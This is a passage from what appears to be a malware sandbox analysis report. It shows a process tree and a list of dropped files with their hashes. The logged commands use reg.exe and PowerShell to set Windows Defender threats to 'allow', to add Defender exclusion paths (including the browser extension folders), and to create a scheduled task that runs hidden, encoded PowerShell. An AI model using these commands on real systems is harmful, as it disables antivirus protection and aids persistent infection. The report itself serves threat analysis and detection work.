                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:1788
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                  PID:3464
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                    PID:1844
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2808
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4656
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4264
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1984
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:1028
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:3316
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:2212
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:5012
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:3996
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4828
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3036
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3904
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4524
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:436
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2820
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:888
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:1624
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PPPhKexxKHjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PPPhKexxKHjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEIgHLylU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEIgHLylU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dbgYcEcZyQUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dbgYcEcZyQUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJTkDUsLcXSLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJTkDUsLcXSLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aiawRKtoMjRxlKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aiawRKtoMjRxlKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EfDQwjblbGMYTvUW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EfDQwjblbGMYTvUW\" /t REG_DWORD /d 0 /reg:64;"
                                                                2⤵
                                                                • Drops file in System32 directory
                                                                • System Location Discovery: System Language Discovery
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1052
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:32
                                                                  3⤵
                                                                    PID:3028
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1344
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:64
                                                                    3⤵
                                                                      PID:3080
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEIgHLylU" /t REG_DWORD /d 0 /reg:32
                                                                      3⤵
                                                                        PID:4964
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEIgHLylU" /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4732
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR" /t REG_DWORD /d 0 /reg:32
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4568
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR" /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4496
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dbgYcEcZyQUn" /t REG_DWORD /d 0 /reg:32
                                                                        3⤵
                                                                          PID:4940
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dbgYcEcZyQUn" /t REG_DWORD /d 0 /reg:64
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3508
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJTkDUsLcXSLC" /t REG_DWORD /d 0 /reg:32
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3556
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJTkDUsLcXSLC" /t REG_DWORD /d 0 /reg:64
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3712
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aiawRKtoMjRxlKVB /t REG_DWORD /d 0 /reg:32
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:4040
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aiawRKtoMjRxlKVB /t REG_DWORD /d 0 /reg:64
                                                                          3⤵
                                                                            PID:2332
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:3528
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                              3⤵
                                                                                PID:3648
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                3⤵
                                                                                  PID:1164
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1480
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1296
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR /t REG_DWORD /d 0 /reg:64
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4812
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EfDQwjblbGMYTvUW /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1732
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EfDQwjblbGMYTvUW /t REG_DWORD /d 0 /reg:64
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1580
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "gpcMsgUiO" /SC once /ST 07:23:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                2⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:2992
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /run /I /tn "gpcMsgUiO"
                                                                                2⤵
                                                                                  PID:3608
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                1⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2064
                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                  2⤵
                                                                                    PID:1592
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                  1⤵
                                                                                    PID:704
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                    1⤵
                                                                                      PID:5060
                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                      gpscript.exe /RefreshSystemParam
                                                                                      1⤵
                                                                                        PID:1988

                                                                                      Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        faa2dd409bb88491b6c57728dbf8a673

                                                                                        SHA1

                                                                                        6095f074030e7599cb1f9c251c62e2c0d1fb7418

                                                                                        SHA256

                                                                                        955d02ee998eae94048f3a1b33c8eedc73276ef0a179efb1cebc970d9af0df09

                                                                                        SHA512

                                                                                        0ab69299400998bc05fe7074b2c9b01162db9343deab22b502a26c47a054d2ca42918908fcc77a8cc5d275c17635508d546c3f65d857f37a7331ec9c32a766ce

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        15KB

                                                                                        MD5

                                                                                        9bbfc0f265436eba8d56a9e7fed9eff8

                                                                                        SHA1

                                                                                        6448e609b06cfe0ec3660685fdbe4268a037650f

                                                                                        SHA256

                                                                                        b68ae0ea00b695a6c3830f41bc92538598ab698cb3c53f7dec2a6f2dd3dded12

                                                                                        SHA512

                                                                                        c0981d90777034fc83bced5ff744ddb0d461edbd29014d5c1532b4e9c7e520c77164e670b3d40b3480264f35cc9ddca9de38b02565a734999295b9436a2bd5f8

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        11KB

                                                                                        MD5

                                                                                        5904ce048860861d4e85988cb97c7e3f

                                                                                        SHA1

                                                                                        2f67883e3f29aa6bcea7032716a3251f557bac13

                                                                                        SHA256

                                                                                        d807998575231f391a4746b5571c1576e7c54f9bac67d4fac74f90f97797783f

                                                                                        SHA512

                                                                                        17cec8c9f50d8ae048d361fd241776ad0e0a8e1997c7daf433a175359fabfcf85184118384416e55d187e45f13d623a2f8c03991860518e64208a2e5dcfd483e

                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000255001\channel2.exe

                                                                                        Filesize

                                                                                        6.3MB

                                                                                        MD5

                                                                                        cfc1a0b3dde8d2c81750a59a016ab5c4

                                                                                        SHA1

                                                                                        98874625561529f76b039f3e274be4400aa35d80

                                                                                        SHA256

                                                                                        0309d52f0c55715859aab3552dff19bc8529cb48e95576ad3d979b0154390609

                                                                                        SHA512

                                                                                        d74335d5a78a4d414bf79dcd13659ef0abad1a02e31aa48bf2087499cd29e1a7907a87339521a3483db3d9458df29c09b7032339d8f83bc651149c9e0c558248

                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe

                                                                                        Filesize

                                                                                        1.3MB

                                                                                        MD5

                                                                                        db2a12edc73769f2f2b6b01545afe2c3

                                                                                        SHA1

                                                                                        73dc44fb0753296f51b851299f468031ceb77b54

                                                                                        SHA256

                                                                                        e6db7d34b498982601b2c45ac5b2a1c1b9502e502514ccffae9862f2aa719f42

                                                                                        SHA512

                                                                                        dadf36bc9c5d88c28b9064892cc263c912ce668435b71802df756c0a4e680f8407011d36498a2511dda7165aea866c0ae794f9ec8fbcc42c7da1661399316ce4

                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000260001\setup1.exe

                                                                                        Filesize

                                                                                        48KB

                                                                                        MD5

                                                                                        0707029388c31cf57cf8ee0f3648c290

                                                                                        SHA1

                                                                                        d92dce0c1ebfc8c2ca71e3beb4084540fb3be075

                                                                                        SHA256

                                                                                        c765a83303ac8876eeca0e78d233615b97e8135749118cd2535c22ec39379ace

                                                                                        SHA512

                                                                                        85295181638fa4eae08c6fbb565fddbf696e495467b0ca775cf48e3b60452d129b1c2a3db47ebf953a60034f971bcec8e93d77b25e0ec3000ee553dbf5dc6f20

                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe

                                                                                        Filesize

                                                                                        7.2MB

                                                                                        MD5

                                                                                        14a56f81287d1e037fc6405247c31d20

                                                                                        SHA1

                                                                                        7648bc39a1d198bc115e5871466fd4478f70b175

                                                                                        SHA256

                                                                                        a8b4bc268063265eba47d7325dbc3f118045c24478d740d3d69c245872ade20a

                                                                                        SHA512

                                                                                        dbd0e1ef97b5c8dd2d2d78b823140863406046cc735a1ac62edef04fa7ab6f9d9644b62cba40637d404016accecb06aab6d3c56c7a27dae05978cf9da8c42d0e

                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe

                                                                                        Filesize

                                                                                        319KB

                                                                                        MD5

                                                                                        0ec1f7cc17b6402cd2df150e0e5e92ca

                                                                                        SHA1

                                                                                        8405b9bf28accb6f1907fbe28d2536da4fba9fc9

                                                                                        SHA256

                                                                                        4c5ca5701285337a96298ebf994f8ba013d290c63afa65b5c2b05771fbbb9ed4

                                                                                        SHA512

                                                                                        7caa2416bc7878493b62a184ddc844d201a9ab5282abfa77a616316af39ff65309e37bb566b3e29d9e764e08f4eda43a06464acaf9962f911b33e6dbc60c1861

                                                                                      • C:\Users\Admin\AppData\Local\Temp\287768749810

                                                                                        Filesize

                                                                                        84KB

                                                                                        MD5

                                                                                        ccc6aeb9b5aee8b15b13f1f6dfcd7ec3

                                                                                        SHA1

                                                                                        f60dbbbc6449fe6fd24ef660ac1c728371c332ba

                                                                                        SHA256

                                                                                        4e95800b2b5bc8ad0d45f6479346ef628579ccbb5f68ef9052337bd90d5b0474

                                                                                        SHA512

                                                                                        900a71eb4672ee0f353f5b496c3003d595c743a29c43cba563da70658471eb9f514f0366cb832cdb4cab4fe9d1431fe8c596fde253f92539a5a9beebf11c6c7d

                                                                                      • C:\Users\Admin\AppData\Local\Temp\684126\C

                                                                                        Filesize

                                                                                        764KB

                                                                                        MD5

                                                                                        0687024f2f53ac5521c7906f3fe520aa

                                                                                        SHA1

                                                                                        ed39dd96a9817591b49f918e2681746880fab7f3

                                                                                        SHA256

                                                                                        112bd1117039e48f288baf93af0f32425e8c713d286c035c9e17e8fb1c109dc1

                                                                                        SHA512

                                                                                        617e34ea0d74de0ddda1eae4a164b512b5e9f0495a3fb37a179d54d660ce3e9e300f0b7963abbbe8d4eef597253c7f98acea5bae0a08c0c6d3abb0f455541fa8

                                                                                      • C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif

                                                                                        Filesize

                                                                                        872KB

                                                                                        MD5

                                                                                        18ce19b57f43ce0a5af149c96aecc685

                                                                                        SHA1

                                                                                        1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

                                                                                        SHA256

                                                                                        d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

                                                                                        SHA512

                                                                                        a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

                                                                                      • C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe

                                                                                        Filesize

                                                                                        63KB

                                                                                        MD5

                                                                                        42ab6e035df99a43dbb879c86b620b91

                                                                                        SHA1

                                                                                        c6e116569d17d8142dbb217b1f8bfa95bc148c38

                                                                                        SHA256

                                                                                        53195987d396986ebcb20425ac130e78ad308fdbd918f33f3fd92b99abda314b

                                                                                        SHA512

                                                                                        2e79de2d394ad33023d71611bb728b254aa4680b5a3a1ef5282b1155ddfaa2f3585c840a6700dfe0d1a276dac801298431f0187086d2e8f96b22f6c808fb97e5

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS113C.tmp\Install.exe

                                                                                        Filesize

                                                                                        6.4MB

                                                                                        MD5

                                                                                        059a2ba5620f3f4b2316685ecfcd36bd

                                                                                        SHA1

                                                                                        46c0517fceeb7350c938ed699d8d8eafd6dc3280

                                                                                        SHA256

                                                                                        f40e8231e63a2e2984bd119a3423c25de2807c2a1a1ae18fc07797d7160280e5

                                                                                        SHA512

                                                                                        6a5c2e0418449175e6cb07f3ddcce15dac7477fb7b6b2857c807524f21a6b856e97dfb7209e0f69826321853899bc7bbda547ca7ec769d516e3394931c3cd346

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS136F.tmp\Install.exe

                                                                                        Filesize

                                                                                        6.7MB

                                                                                        MD5

                                                                                        523c9df50948340df2e82213b22c72b7

                                                                                        SHA1

                                                                                        9260e4afb910e4f0c98aad1bf8b9bc31f5d7467f

                                                                                        SHA256

                                                                                        26f9eafb7869a2bfa9af2ede0363c2a41af6839c4263f6c107ab723de9dd2e37

                                                                                        SHA512

                                                                                        28432c1fe74d0f74f3b2edce9cdb2a987e170cd19738384ca63be432108d17d636fc78fc4d55a84b36f7c19ea1999988cd488798064daef986784d6eb4e92c32

                                                                                      • C:\Users\Admin\AppData\Local\Temp\Defend

                                                                                        Filesize

                                                                                        72KB

                                                                                        MD5

                                                                                        3ffe3c3fb21a5ed46a9978d2b5947b6d

                                                                                        SHA1

                                                                                        819162aff48f808f9f3b5e3ef4d0c796aa9db8e7

                                                                                        SHA256

                                                                                        7653a8cf9ba473a69bb709bf79e5fa9a9c6241a4b1e3322f2dddb687757be597

                                                                                        SHA512

                                                                                        9bd9e6c0eea5f5c1a8ca9bf73462ec5ebf40d6d1288cfdd9771fc8aca1483532fb32ae7db78bb1a097a402446e5bd2bdb74a569bd22d629044a1cf6c75da48d8

                                                                                      • C:\Users\Admin\AppData\Local\Temp\Done

                                                                                        Filesize

                                                                                        71KB

                                                                                        MD5

                                                                                        6313731000c458f93f3b38f8efe8f473

                                                                                        SHA1

